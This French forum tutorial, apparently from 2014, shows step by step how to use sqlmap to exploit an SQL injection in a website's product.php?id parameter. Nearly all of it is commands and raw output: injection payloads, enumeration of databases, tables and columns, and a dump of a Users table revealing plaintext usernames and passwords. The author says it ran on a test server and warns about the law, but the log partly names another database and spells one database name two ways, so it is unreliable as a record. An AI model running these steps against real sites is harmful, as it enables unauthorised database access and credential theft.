user@linuxtrack:~ $ python -c 'print("Soyez les bienvenus !")'

Vous n'êtes pas identifié(e).

#1 18-07-2014 18:41:04

IceF0x
#! Gourou Linux

[Tuto]Exemple d'exploitation SQL avec SQLmap sous backtrack 5 R1

== Présentation ==

Voici exemple d'exploitation SQL à l'aide de l'application SQLmap.

SQLmap est installé par défaut sur Backtrack 5 R1, mais je vous met le tutoriel d'installation au cas ou vous voudriez le tester sous d'autres Linux ou le mettre à jour.
Note de Inazo: Un gros défaut pour ces outils c'est la quantité de trace générer par les tests de requêtes, si l'attaque peut être simple avec sqlmap, il est mieux de privilégier de le faire à la main.

== Installation ==

C'est très simple vu que c'est codé en python il ne faut même pas compiler.

http://sourceforge.net/projects/sqlmap/files/sqlmap/0.9/sqlmap-0.9.tar.gz/d…

On extrait l'archive.

tar -xzvf sqlmap-0.9.tar.gz
mv /pentest/database/sqlmap/

==Usage==

On se rend dans le répertoire de sqlmap

cd /pentest/database/sqlmap/

Et Nous lançons l'attaque sur le site à pentester.

python sqlmap.py -u http://www.sitetest.com/product.php?id=54 --dbs

Nous attendons et à la question posé a un moment [Y/N] nous répondons N.

$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 --dbs

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:19:54

[11:19:54] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:19:54] [INFO] testing connection to the target url
[11:19:56] [INFO] testing if the url is stable, wait a few seconds
[11:19:57] [INFO] url is stable
[11:19:57] [INFO] testing if GET parameter 'id' is dynamic
[11:19:58] [INFO] confirming that GET parameter 'id' is dynamic
[11:19:59] [INFO] GET parameter 'id' is dynamic
[11:19:59] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[11:19:59] [INFO] testing sql injection on GET parameter 'id'
[11:19:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:20:02] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[11:20:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:20:08] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable 
[11:20:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:20:08] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:21:09] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable 
[11:21:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:21:39] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[11:22:10] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[11:22:41] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[11:22:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] n
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=54 AND 5486=5486

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=54 AND SLEEP(5)
---

[11:23:03] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:23:03] [INFO] fetching database names
[11:23:04] [INFO] the SQL query used returns 5 entries
[11:23:04] [INFO] retrieved: information_schema
[11:23:04] [INFO] retrieved: www_choseprentals_com
[11:23:05] [INFO] retrieved: www_chose_com
[11:23:05] [INFO] retrieved: www_chose_com_working
[11:23:06] [INFO] retrieved: www_sitetest_com
available databases [5]:
[*] information_schema
[*] www_choserentals_com
[*] www_chose_com
[*] www_chose_com_working
[*] www_sitetest_com

[11:23:06] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'

[*] shutting down at: 11:23:06

Nous regardons les tables.

$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com --tables

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:26:59

[11:26:59] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:26:59] [INFO] resuming injection data from session file
[11:26:59] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:26:59] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=54 AND 5486=5486

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=54 AND SLEEP(5)
---

[11:27:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:27:00] [INFO] fetching tables for database 'www_sitetest_com'
[11:27:01] [INFO] the SQL query used returns 62 entries
[11:27:01] [INFO] retrieved: www_sitetest_com
[11:27:02] [INFO] retrieved: AssemblyInstructions
[11:27:02] [INFO] retrieved: www_sitetest_com
[11:27:03] [INFO] retrieved: BrandedList
[11:27:03] [INFO] retrieved: www_sitetest_com
[11:27:04] [INFO] retrieved: BrandedMapProducts
[11:27:04] [INFO] retrieved: www_sitetest_com
[11:27:05] [INFO] retrieved: CampaignHits
[11:27:05] [INFO] retrieved: www_sitetest_com
[11:27:06] [INFO] retrieved: CatMapProducts
[11:27:06] [INFO] retrieved: www_sitetest_com
[11:27:07] [INFO] retrieved: CatalogList
[11:27:07] [INFO] retrieved: www_sitetest_com
[11:27:08] [INFO] retrieved: Category
[11:27:08] [INFO] retrieved: www_sitetest_com
[11:27:09] [INFO] retrieved: CheckersMetrics
[11:27:09] [INFO] retrieved: www_sitetest_com
[11:27:10] [INFO] retrieved: Customers
[11:27:10] [INFO] retrieved: www_sitetest_com
[11:27:11] [INFO] retrieved: EJCustomers
[11:27:11] [INFO] retrieved: www_sitetest_com
[11:27:12] [INFO] retrieved: EJOrderItems
[11:27:12] [INFO] retrieved: www_sitetest_com
[11:27:13] [INFO] retrieved: EJOrders
[11:27:13] [INFO] retrieved: www_sitetest_com
[11:27:14] [INFO] retrieved: Email
[11:27:14] [INFO] retrieved: www_sitetest_com
[11:27:15] [INFO] retrieved: EmailList
[11:27:15] [INFO] retrieved: www_sitetest_com
[11:27:16] [INFO] retrieved: HomePagePics
[11:27:16] [INFO] retrieved: www_sitetest_com
[11:27:17] [INFO] retrieved: HomePageProducts
[11:27:17] [INFO] retrieved: www_sitetest_com
[11:27:18] [INFO] retrieved: HomePages
[11:27:18] [INFO] retrieved: www_sitetest_com
[11:27:19] [INFO] retrieved: LPBrandedList
[11:27:19] [INFO] retrieved: www_sitetest_com
[11:27:20] [INFO] retrieved: LPHomePages
[11:27:20] [INFO] retrieved: www_sitetest_com
[11:27:21] [INFO] retrieved: LPMetrics
[11:27:22] [INFO] retrieved: www_sitetest_com
[11:27:22] [INFO] retrieved: Model
[11:27:23] [INFO] retrieved: www_sitetest_com
[11:27:23] [INFO] retrieved: PageMetaData
[11:27:24] [INFO] retrieved: www_sitetest_com
[11:27:24] [INFO] retrieved: PhotoGallery
[11:27:25] [INFO] retrieved: www_sitetest_com
[11:27:25] [INFO] retrieved: PriceBook
[11:27:26] [INFO] retrieved: www_sitetest_com
[11:27:26] [INFO] retrieved: PriceBookLogos
[11:27:27] [INFO] retrieved: www_sitetest_com
[11:27:27] [INFO] retrieved: PriceBookMasterPriceList
[11:27:28] [INFO] retrieved: www_sitetest_com
[11:27:28] [INFO] retrieved: PriceBookPasswordRequest
[11:27:29] [INFO] retrieved: www_sitetest_com
[11:27:29] [INFO] retrieved: PriceBookProductGroups
[11:27:30] [INFO] retrieved: www_sitetest_com
[11:27:30] [INFO] retrieved: PriceBookReports
[11:27:31] [INFO] retrieved: www_sitetest_com
[11:27:31] [INFO] retrieved: PriceBookSpecialPriceList
[11:27:32] [INFO] retrieved: www_sitetest_com
[11:27:32] [INFO] retrieved: PriceBookUserMetrics
[11:27:33] [INFO] retrieved: www_sitetest_com
[11:27:33] [INFO] retrieved: PriceBookUsers
[11:27:34] [INFO] retrieved: www_sitetest_com
[11:27:34] [INFO] retrieved: ProductAccessoryPictures
[11:27:35] [INFO] retrieved: www_sitetest_com
[11:27:35] [INFO] retrieved: ProductFeatures
[11:27:36] [INFO] retrieved: www_sitetest_com
[11:27:36] [INFO] retrieved: ProductLoadCapacity
[11:27:36] [INFO] retrieved: www_sitetest_com
[11:27:37] [INFO] retrieved: ProductNewFeatures
[11:27:37] [INFO] retrieved: www_sitetest_com
[11:27:38] [INFO] retrieved: ProductNotes
[11:27:38] [INFO] retrieved: www_sitetest_com
[11:27:39] [INFO] retrieved: ProductPicturesByBrand
[11:27:39] [INFO] retrieved: www_sitetest_com
[11:27:40] [INFO] retrieved: ProductPicturesByCategory
[11:27:40] [INFO] retrieved: www_sitetest_com
[11:27:41] [INFO] retrieved: ProductRelatedModels
[11:27:41] [INFO] retrieved: www_sitetest_com
[11:27:42] [INFO] retrieved: ProductSpecifications
[11:27:42] [INFO] retrieved: www_sitetest_com
[11:27:43] [INFO] retrieved: ProductSymbols
[11:27:43] [INFO] retrieved: www_sitetest_com
[11:27:44] [INFO] retrieved: ProductWarnings
[11:27:44] [INFO] retrieved: www_sitetest_com
[11:27:45] [INFO] retrieved: Products
[11:27:45] [INFO] retrieved: www_sitetest_com
[11:27:46] [INFO] retrieved: ProductsMapModels
[11:27:46] [INFO] retrieved: www_sitetest_com
[11:27:47] [INFO] retrieved: RelatedLinks
[11:27:47] [INFO] retrieved: www_sitetest_com
[11:27:48] [INFO] retrieved: RentalCustomers
[11:27:48] [INFO] retrieved: www_sitetest_com
[11:27:49] [INFO] retrieved: RentalOrderDetails
[11:27:50] [INFO] retrieved: www_sitetest_com
[11:27:50] [INFO] retrieved: RentalOrders
[11:27:51] [INFO] retrieved: www_sitetest_com
[11:27:51] [INFO] retrieved: RentalUsers
[11:27:52] [INFO] retrieved: www_sitetest_com
[11:27:52] [INFO] retrieved: SiteParameters
[11:27:53] [INFO] retrieved: www_sitetest_com
[11:27:53] [INFO] retrieved: Transpage
[11:27:54] [INFO] retrieved: www_sitetest_com
[11:27:55] [INFO] retrieved: Users
[11:27:55] [INFO] retrieved: www_sitetest_com
[11:27:56] [INFO] retrieved: WebHeaders
[11:27:56] [INFO] retrieved: www_sitetest_com
[11:27:57] [INFO] retrieved: WebsiteBrands
[11:27:57] [INFO] retrieved: www_sitetest_com
[11:27:58] [INFO] retrieved: WebsiteCategory
[11:27:58] [INFO] retrieved: www_sitetest_com
[11:27:58] [INFO] retrieved: WebsiteContactInfo
[11:27:59] [INFO] retrieved: www_sitetest_com
[11:27:59] [INFO] retrieved: WebsiteModels
[11:28:00] [INFO] retrieved: www_sitetest_com
[11:28:00] [INFO] retrieved: WebsiteProducts
[11:28:01] [INFO] retrieved: www_sitetest_com
[11:28:01] [INFO] retrieved: Websites
[11:28:02] [INFO] retrieved: www_sitetest_com
[11:28:02] [INFO] retrieved: orderItems
[11:28:03] [INFO] retrieved: www_sitetest_com
[11:28:03] [INFO] retrieved: orders
Database: www_sitetest_com
[62 tables]
+---------------------------+
| AssemblyInstructions      |
| BrandedList               |
| BrandedMapProducts        |
| CampaignHits              |
| CatMapProducts            |
| CatalogList               |
| Category                  |
| CheckersMetrics           |
| Customers                 |
| EJCustomers               |
| EJOrderItems              |
| EJOrders                  |
| Email                     |
| EmailList                 |
| HomePagePics              |
| HomePageProducts          |
| HomePages                 |
| LPBrandedList             |
| LPHomePages               |
| LPMetrics                 |
| Model                     |
| PageMetaData              |
| PhotoGallery              |
| PriceBook                 |
| PriceBookLogos            |
| PriceBookMasterPriceList  |
| PriceBookPasswordRequest  |
| PriceBookProductGroups    |
| PriceBookReports          |
| PriceBookSpecialPriceList |
| PriceBookUserMetrics      |
| PriceBookUsers            |
| ProductAccessoryPictures  |
| ProductFeatures           |
| ProductLoadCapacity       |
| ProductNewFeatures        |
| ProductNotes              |
| ProductPicturesByBrand    |
| ProductPicturesByCategory |
| ProductRelatedModels      |
| ProductSpecifications     |
| ProductSymbols            |
| ProductWarnings           |
| Products                  |
| ProductsMapModels         |
| RelatedLinks              |
| RentalCustomers           |
| RentalOrderDetails        |
| RentalOrders              |
| RentalUsers               |
| SiteParameters            |
| Transpage                 |
| Users                     |
| WebHeaders                |
| WebsiteBrands             |
| WebsiteCategory           |
| WebsiteContactInfo        |
| WebsiteModels             |
| WebsiteProducts           |
| Websites                  |
| orderItems                |
| orders                    |
+---------------------------+

[11:28:03] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'

[*] shutting down at: 11:28:03

Nous allons checker la colonne Users pour l'exemple.

python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com -T Users --columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:30:38

[11:30:38] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:30:38] [INFO] resuming injection data from session file
[11:30:38] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:30:38] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=54 AND 5486=5486

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=54 AND SLEEP(5)
---

[11:30:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:30:39] [INFO] fetching columns for table 'Users' on database 'www_sitetest_com'
[11:30:40] [INFO] the SQL query used returns 4 entries
[11:30:40] [INFO] retrieved: ID
[11:30:41] [INFO] retrieved: int(11)
[11:30:41] [INFO] retrieved: UserName
[11:30:42] [INFO] retrieved: varchar(255)
[11:30:42] [INFO] retrieved: Password
[11:30:43] [INFO] retrieved: varchar(255)
[11:30:43] [INFO] retrieved: Email
[11:30:44] [INFO] retrieved: varchar(255)
Database: www_sitetest_com
Table: Users
[4 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| Email    | varchar(255) |
| ID       | int(11)      |
| Password | varchar(255) |
| UserName | varchar(255) |
+----------+--------------+

[11:30:44] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'

[*] shutting down at: 11:30:44

Nous allons faire un simple test sur la base ID juste pour voir smile et laisser le suspens wink

$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com -T Users -C ID --dump

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:32:36

[11:32:37] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:32:37] [INFO] resuming injection data from session file
[11:32:37] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:32:37] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=54 AND 5486=5486

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=54 AND SLEEP(5)
---

[11:32:38] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:32:38] [INFO] fetching columns 'ID' entries for table 'Users' on database 'www_checkersindustrial_com'
[11:32:38] [INFO] the SQL query used returns 3 entries
[11:32:39] [INFO] retrieved: 1
[11:32:39] [INFO] retrieved: 2
[11:32:40] [INFO] retrieved: 3
Database: www_sitetest_com
Table: Users
[3 entries]
+----+
| ID |
+----+
| 1  |
| 2  |
| 3  |
+----+

[11:32:40] [INFO] Table 'www_sitetest_com.Users' dumped to CSV file '/home/user/sqlmap/output/www.sitetest.com/dump/www_sitetest_com/Users.csv'
[11:32:40] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'

[*] shutting down at: 11:32:40

Nous voyons que les identifiant des utilisateur sont 1, 2 et 3 ces chiffres on un signification, mais on ne va pas s'ent occuper maintenant.

$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com -T Users -C Password --dump

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:34:50

[11:34:51] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:34:51] [INFO] resuming injection data from session file
[11:34:51] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:34:51] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=54 AND 5486=5486

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=54 AND SLEEP(5)
---

[11:34:52] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:34:52] [INFO] fetching columns 'Password' entries for table 'Users' on database 'www_checkersindustrial_com'
[11:34:52] [INFO] read from file '/home/user/sqlmap/output/www.sitetest.com/session': 3
[11:34:52] [INFO] the SQL query used returns 3 entries
[11:34:53] [INFO] retrieved: grissom
[11:34:54] [INFO] retrieved: robbi
[11:34:54] [INFO] retrieved: cab!lost
Database: www_sitetest_com
Table: Users
[3 entries]
+----------+
| Password |
+----------+
| grissom  |
| robbi    |
| cab!lost |
+----------+

[11:34:54] [INFO] Table 'www_sitetest_com.Users' dumped to CSV file '/home/user/sqlmap/output/www.sitetest.com/dump/www_sitetest_com/Users.csv'
[11:34:54] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'

[*] shutting down at: 11:34:54

Nous voyons ici que le password de l'utilisateur 1 est grissom.

Passons aux noms d'utilisateurs

$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com -T Users -C UserName --dump

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:40:23

[11:40:24] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:40:24] [INFO] resuming injection data from session file
[11:40:24] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:40:24] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=54 AND 5486=5486

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=54 AND SLEEP(5)
---

[11:40:25] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:40:25] [INFO] fetching columns 'UserName' entries for table 'Users' on database 'www_checkersindustrial_com'
[11:40:25] [INFO] read from file '/home/user/sqlmap/output/www.sitetest.com/session': 3
[11:40:25] [INFO] the SQL query used returns 3 entries
[11:40:25] [INFO] retrieved: bryan
[11:40:26] [INFO] retrieved: robbi
[11:40:26] [INFO] retrieved: jesica
Database: www_sitetest_com
Table: Users
[3 entries]
+----------+
| UserName |
+----------+
| bryan    |
| robbi    |
| jesica   |
+----------+

[11:40:26] [INFO] Table 'www_sitetest_com.Users' dumped to CSV file '/home/user/sqlmap/output/www.sitetest.com/dump/www_sitetest_com/Users.csv'
[11:40:26] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'

[*] shutting down at: 11:40:26

Et voilà UserName : bryan PassWord : grissom

1405701652_danger.png je précise que je n'ai pas utilisé SQLmap dans des condition réelle, mais sur un site faillible installé pour le test sur un serveur dédié au test.
Tout usage de ce logiciel à des fin autre que le test d'un site ne vous appartenant pas est punissable selon les loi en vigueur dans votre pays.


Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D

Hors ligne

#2 01-01-2016 11:02:07

IceF0x
#! Gourou Linux

Re : [Tuto]Exemple d'exploitation SQL avec SQLmap sous backtrack 5 R1


Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D

Hors ligne

Pied de page des forums